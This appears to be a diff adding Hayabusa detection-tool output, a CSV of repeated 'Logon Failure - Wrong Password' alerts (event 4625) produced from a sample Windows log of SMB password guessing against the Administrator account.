+2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n54EaKOUQIX9geqx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m6WCg3o4oatO42wW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KfCwo8ZUWiBqI8zC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8potisENMIsbNxcd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgagMNj95dkg9uQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1EVsGLFugwePvgR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q00SeueJQAiBGpe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWzSR1cJ2XJNirSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39MY5ZvRJSHVkZZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WyOdltctwdHNkH6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUcWk0xJn9zVMZSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2sauqNlJi3y0ZBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkih5QcLlcjw9gjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3KlUJslcpS9jhLY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: riuVWV1Ugr9c22hR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OSj1I0sXkPf96OL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsOJDxDiZSjoBj6F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uH0bQ9zEi1xcfHn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3AfNT0p4JC1VEfDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7T8R8U1WVHZQrYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kamexpa7isWT8gLC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8CyHFKVcdTo0Upx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U30aMcZuBD08GWK1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4mihftSCNCYdlBny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K2wa0xwK6tnurGJQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0V3TbNrKEnrDcEYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T73JW9JURm8Br6MA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OAleyg3h8aMvVVJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LQllnWZFUIWa6rw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlwPxSGUmvYH0rpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrI56o5TyeO48rQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CKRMn75tv5Yi5rYK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MbJvec7rVisJ6WCC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xoubp5WTPqblBaps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBczkR92cKY41icQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfUx3OizEb1LiOzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRaSOLOWhBEr0qkz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YnlI8Zh4td5m1fpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wXUDXDa4wi3HivKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TT7iOtVMFcEysCcI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1NJpI7KC3gj99aWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H39cv9JEuLEjlp93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4p9h1cjLeUzppSZb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0fOpi4vr55QmO6x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GiKI4V6kpkY5zc9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dLmu4n9qZdf3Q5zo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 87iJdX2E0ZJintvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxc4iIHP0kdqQNiG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJIWekwBwcIUWjD1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GdnvboiIDzXTZ8MR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGMPHNpljTlMYeet | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWo4uVFtAbe4IjKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YAPdDqbMY4rYiuZ3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ai2WCQ3MkWwSeOy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ey1wbsD7w3fs02xP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sVGzidwZICNfLizg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zjGPMJ6RBw48Ejx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MydK8AjPvyyckCEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fqkCliAQMiFffQU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITkku4kN4csBFyUB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g9kMkSFhKrT2Py | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1xKLdwujTmLEc9ts | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sAW1YzCQ3CreseaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhqBirEHOKPepR3n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uqSFXpzAWOnc90n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: McbeS9lRpbMc48jO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6J0d7dQUmJNKJlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QG3WU91rhTP9odx7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSQRgB8yMfhb03g1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bzbZjRXTc0XvV4Ry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3ShOCSaLGX4YBWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lIrydzi8nmY251Z1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4vlRksTGxAqEt9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJMnD0foEDbcNfTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
